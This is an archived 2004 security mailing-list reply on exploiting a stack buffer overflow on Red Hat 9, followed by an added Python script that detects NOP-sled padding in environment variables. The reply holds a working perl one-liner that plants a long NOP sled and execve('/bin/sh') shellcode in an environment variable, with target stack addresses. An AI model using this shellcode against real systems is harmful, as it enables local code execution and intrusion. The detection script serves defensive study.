Vulnerability Development mailing list archives
Re: Buffer Overflow Help
From: Harry de Grote <rik.bobbaers () cc kuleuven ac be>
Date: Wed, 10 Nov 2004 12:01:24 +0200
On Tuesday 09 November 2004 04:09, eip () tampabay rr com wrote:
<snip>
> I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat 9 box, kernel 2.4.20-31.9. Am I doing something wrong?
no, you don't, but... RH does randomize the stack a little iirc, so my way of doing stuff then is just brute force it! :) (you could also return to libc or whatever)

best way to do it (i think) is: put your shellcode in the env...

export SHELLCODE=`perl -e '{print "\x90"x65000 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`

that should give you some breathing space for where to jump to... shellcode starts (on my box) at 0xbfff0027, so everything from there to 0xbffffe00 should do fine...

-- 
harry aka Rik Bobbaers
K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaers () cc kuleuven ac be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"
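The reply above relies on padding an environment variable with a very long run of 0x90 bytes so that a guessed stack address only has to land somewhere in the padding. From the defender's side, that padding is also the most visible part of the technique: environment data is normally short printable text, and a run of thousands of identical non-printable bytes in a variable is cheap to flag. The script below is an added example, not code from the poster or from the thread; it scans a NUL-separated environment block (the layout Linux exposes in /proc/<pid>/environ) for such runs. The 64-byte threshold and the constructed sample environment are assumptions made for this example.

```python
"""
Flag environment variables whose value contains a long run of one byte.

Environment blocks are NUL-separated KEY=VALUE entries; /proc/<pid>/environ
on Linux uses exactly this layout, so the same functions can be pointed at
a live process by reading that file. The sample block at the bottom is
constructed for the example and does not contain a working payload.
"""
from typing import List, Tuple

# Assumed threshold for this example: legitimate variables (PATH, locale
# settings, terminal names) essentially never repeat one byte 64 times.
MIN_RUN = 64
NOP_BYTE = 0x90  # x86 single-byte NOP, the byte used for padding in the thread


def parse_environ(block: bytes) -> List[Tuple[bytes, bytes]]:
    """Split a NUL-separated environ block into (name, value) pairs."""
    pairs = []
    for entry in block.split(b"\0"):
        if not entry:
            continue  # trailing or doubled NUL
        name, _, value = entry.partition(b"=")
        pairs.append((name, value))
    return pairs


def longest_run(value: bytes, byte: int) -> int:
    """Length of the longest consecutive run of `byte` inside `value`."""
    best = cur = 0
    for b in value:
        cur = cur + 1 if b == byte else 0
        best = max(best, cur)
    return best


def non_printable_ratio(value: bytes) -> float:
    """Fraction of bytes outside printable ASCII; near 1.0 means binary data."""
    if not value:
        return 0.0
    bad = sum(1 for b in value if b < 0x20 or b > 0x7E)
    return bad / len(value)


def find_sleds(block: bytes, byte: int = NOP_BYTE,
               min_run: int = MIN_RUN) -> List[Tuple[bytes, int]]:
    """Return (variable name, run length) for each variable whose value
    holds a run of `byte` at least `min_run` bytes long."""
    hits = []
    for name, value in parse_environ(block):
        run = longest_run(value, byte)
        if run >= min_run:
            hits.append((name, run))
    return hits


# Constructed sample: an ordinary environment plus one variable padded with
# 200 NOP bytes and a short non-printable tail. Not a working payload.
SAMPLE_ENVIRON = (
    b"HOME=/home/user\0"
    b"PATH=/usr/local/bin:/usr/bin:/bin\0"
    b"LANG=en_US.UTF-8\0"
    b"SUSPECT=" + b"\x90" * 200 + b"\xcc\xcc\xcc\xcc" + b"\0"
)

if __name__ == "__main__":
    # To inspect a live process instead, read /proc/<pid>/environ and pass
    # the bytes to find_sleds(); the format is identical.
    for name, run in find_sleds(SAMPLE_ENVIRON):
        print(f"{name.decode()}: run of {run} x 0x{NOP_BYTE:02x} bytes, "
              f"non-printable ratio {non_printable_ratio(dict(parse_environ(SAMPLE_ENVIRON))[name]):.2f}")
```

The run-length check is deliberately simple: it catches the padding the thread describes, but a padded payload that uses a rotating set of harmless instructions instead of a single byte would pass it, which is why the non-printable ratio is reported alongside as a second signal. Note that this only inspects data the process itself can see; it says nothing about whether the program reading that environment has an overflow at all.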
Current thread:
- Buffer Overflow Help eip (Nov 09)
- Re: Buffer Overflow Help Harry de Grote (Nov 10)
- Re: Buffer Overflow Help runixd (Nov 10)
- <Possible follow-ups>
- RE: Buffer Overflow Help Carlos Carvalho (Nov 10)
- Re: Buffer Overflow Help Steve Bonds (Nov 12)
- Re: Buffer Overflow Help Marco Ivaldi (Nov 12)
- Re: Buffer Overflow Help sin (Nov 12)
- Re: Buffer Overflow Help Steve Bonds (Nov 14)
- RE: Buffer Overflow Help Chris Eagle (Nov 15)
- Re: Buffer Overflow Help Steve Bonds (Nov 15)
- Re: Buffer Overflow Help sin (Nov 12)
- Re: Buffer Overflow Help Harry de Grote (Nov 10)